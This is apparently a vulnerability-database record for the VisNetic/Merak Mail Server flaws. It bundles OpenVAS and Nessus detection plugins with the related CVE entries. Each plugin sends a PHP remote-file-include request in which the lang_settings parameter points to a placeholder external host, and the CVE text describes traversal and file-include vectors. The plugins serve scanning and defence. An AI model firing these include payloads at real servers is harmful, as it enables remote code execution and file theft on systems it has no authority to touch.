VisNetic / Merak Mail Server multiple flaws

2006-03-26T00:00:00

Description

The remote webmail server is affected by multiple vulnerabilities which may allow an attacker to execute arbitrary commands on the remote host. Description: The remote host is running VisNetic / Merak Mail Server, a multi-featured mail server for Windows. The webmail and webadmin services included in the remote version of this software are prone to multiple flaws. An attacker could send specially-crafted URLs to execute arbitrary scripts, perhaps taken from third-party hosts, or to disclose the content of files on the remote system.

{"id": "OPENVAS:20346", "type": "openvas", "bulletinFamily": "scanner", "title": "VisNetic / Merak Mail Server multiple flaws", "description": "The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.", "published": "2006-03-26T00:00:00", "modified": "2017-12-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=20346", "reporter": "This script is Copyright (C) 2005 David Maciejak", "references": ["http://www.deerfield.com/download/visnetic-mailserver/", "http://secunia.com/secunia_research/2005-62/advisory/"], "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "lastseen": "2017-12-08T11:44:05", "viewCount": 6, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-4556", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4559", "CVE-2006-0817", "CVE-2006-0818"]}, {"type": "nessus", "idList": ["VISNETIC_MAILSERVER_FLAWS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231020346"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2005-4556", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4559"]}, {"type": "nessus", "idList": ["VISNETIC_MAILSERVER_FLAWS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231020346"]}]}, "exploitation": null, "vulnersScore": 0.4}, "pluginID": "20346", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: visnetic_mailserver_flaws.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: VisNetic / Merak Mail Server multiple flaws\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.\";\n\ntag_solution = \"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n8.3.5 or later.\";\n\n# Ref: Tan Chew Keong, Secunia Research\n\nif(description)\n{\n script_id(20346);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n \n name = \"VisNetic / Merak Mail Server multiple flaws\";\n script_name(name);\n \n \n \n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"http_version.nasl\");\n script_require_ports(32000, \"Services/www\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2005-62/advisory/\");\n script_xref(name : \"URL\" , value : \"http://www.deerfield.com/download/visnetic-mailserver/\");\n exit(0);\n}\n\n#\n# da code\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif ( !get_kb_item(\"Settings/disable_cgi_scanning\") )\n port = get_http_port(default:32000);\nelse\n port = 32000;\n\nif(!get_port_state(port))exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\ndirs = make_list(\"/mail\", \"\");\nforeach dir (dirs) {\n req = http_get(item:string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/openvas/\"), port:port);\n r = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://xxxxxxxxxxxxxxx/openvas/alang.html\" >< r)\n {\n security_message(port);\n exit(0);\n }\n}\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659703426}}

{"nessus": [{"lastseen": "2021-10-16T16:15:11", "description": "The remote host is running VisNetic / Merak Mail Server, a multi- featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of this software are prone to multiple flaws. An attacker could send specially crafted URLs to execute arbitrary scripts, perhaps taken from third-party hosts, or to disclose the content of files on the remote system.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2005-12-28T00:00:00", "type": "nessus", "title": "VisNetic / Merak Mail Server Multiple Remote Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-4556", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4559"], "modified": "2021-01-19T00:00:00", "cpe": [], "id": "VISNETIC_MAILSERVER_FLAWS.NASL", "href": "https://www.tenable.com/plugins/nessus/20346", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20346);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n\n script_name(english:\"VisNetic / Merak Mail Server Multiple Remote Vulnerabilities\");\n script_summary(english:\"Checks for VisNetic Mail Server arbitrary script include\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote webmail server is affected by multiple vulnerabilities\nthat could allow an attacker to execute arbitrary commands on the\nremote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running VisNetic / Merak Mail Server, a multi-\nfeatured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/community/research/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.deerfield.com/download/visnetic-mailserver/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n8.3.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2005-4556\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/28\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/12/27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(32000, \"Services/www\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# da code\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif ( !get_kb_item(\"Settings/disable_cgi_scanning\") )\n port = get_http_port(default:32000, embedded:TRUE);\nelse\n port = 32000;\n\nif(!get_port_state(port))exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\ndirs = make_list(\"/mail\", \"\");\nforeach dir (dirs) {\n req = http_get(item:string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://example.com/nessus/\"), port:port);\n r = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://example.com/nessus/alang.html\" >< r)\n {\n security_hole(port);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-08T08:39:56", "description": "The remote webmail server is affected by multiple vulnerabilities\n which may allow an attacker to execute arbitrary commands on the remote host.", "cvss3": {}, "published": "2006-03-26T00:00:00", "type": "openvas", "title": "VisNetic / Merak Mail Server multiple flaws", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:136141256231020346", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020346", "sourceData": "# OpenVAS Vulnerability Test\n# Description: VisNetic / Merak Mail Server multiple flaws\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# Ref: Tan Chew Keong, Secunia Research\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.20346\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n script_name(\"VisNetic / Merak Mail Server multiple flaws\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2005 David Maciejak\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 32000);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/secunia_research/2005-62/advisory/\");\n script_xref(name:\"URL\", value:\"http://www.deerfield.com/download/visnetic-mailserver/\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n 8.3.5 or later.\");\n\n script_tag(name:\"summary\", value:\"The remote webmail server is affected by multiple vulnerabilities\n which may allow an attacker to execute arbitrary commands on the remote host.\");\n\n script_tag(name:\"impact\", value:\"An attacker could send specially-crafted URLs to execute arbitrary\n scripts, perhaps taken from third-party hosts, or to disclose the content of files on the remote system.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:32000);\nif(!http_can_host_php(port:port))\n exit(0);\n\nvt_strings = get_vt_strings();\nvt_string = vt_strings[\"lowercase\"];\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\nforeach dir(make_list(\"/mail\", \"\")) {\n\n url = string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/\", vt_string, \"/\");\n req = http_get(item:url, port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://xxxxxxxxxxxxxxx/\" + vt_string + \"/alang.html\" >< res) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:54:19", "description": "mail/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly initialize the default_layout and layout_settings variables when an unrecognized HTTP_USER_AGENT string is provided, which allows remote attackers to access arbitrary files via a request with an unrecognized User Agent that also specifies the desired default_layout and layout_settings parameters.", "cvss3": {}, "published": "2005-12-28T11:03:00", "type": "cve", "title": "CVE-2005-4559", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4559"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "id": "CVE-2005-4559", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4559", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.0_build1:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.0r:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:15", "description": "PHP remote file include vulnerability in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, when register_globals is enabled, allows remote attackers to include arbitrary local and remote PHP files via a URL in the (1) lang_settings and (2) language parameters in (a) accounts/inc/include.php and (b) admin/inc/include.php.", "cvss3": {}, "published": "2005-12-28T11:03:00", "type": "cve", "title": "CVE-2005-4556", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4556"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "id": "CVE-2005-4556", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4556", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.0_build1:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.0r:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:15", "description": "dir/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, allows remote attackers to include arbitrary local files via a null byte (%00) in the lang parameter, possibly due to a directory traversal vulnerability.", "cvss3": {}, "published": "2005-12-28T11:03:00", "type": "cve", "title": "CVE-2005-4557", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4557"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "id": "CVE-2005-4557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4557", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.0_build1:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.0r:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:17", "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "cvss3": {}, "published": "2005-12-28T11:03:00", "type": "cve", "title": "CVE-2005-4558", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4558"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "id": "CVE-2005-4558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.0_build1:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.0r:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:20:53", "description": "Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556.", "cvss3": {}, "published": "2006-07-21T14:03:00", "type": "cve", "title": "CVE-2006-0817", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4556", "CVE-2006-0817"], "modified": "2018-10-18T16:29:00", "cpe": ["cpe:/a:deerfield:visnetic_mail_server:8.3.5", "cpe:/a:merak:mail_server:8.3.8r", "cpe:/a:icewarp:web_mail:5.6.0"], "id": "CVE-2006-0817", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0817", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.8r:*:windows:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:20:54", "description": "Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558.", "cvss3": {}, "published": "2006-07-21T14:03:00", "type": "cve", "title": "CVE-2006-0818", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4558", "CVE-2006-0818"], "modified": "2018-10-18T16:29:00", "cpe": ["cpe:/a:merak:mail_server:8.3.8r", "cpe:/a:icewarp:web_mail:5.6.0", "cpe:/a:deerfield:visnetic_mail_server:8.3.5"], "id": "CVE-2006-0818", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0818", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:deerfield:visnetic_mail_server:8.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:web_mail:5.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:merak:mail_server:8.3.8r:*:windows:*:*:*:*:*"]}]}

VisNetic / Merak Mail Server multiple flaws

Description

Related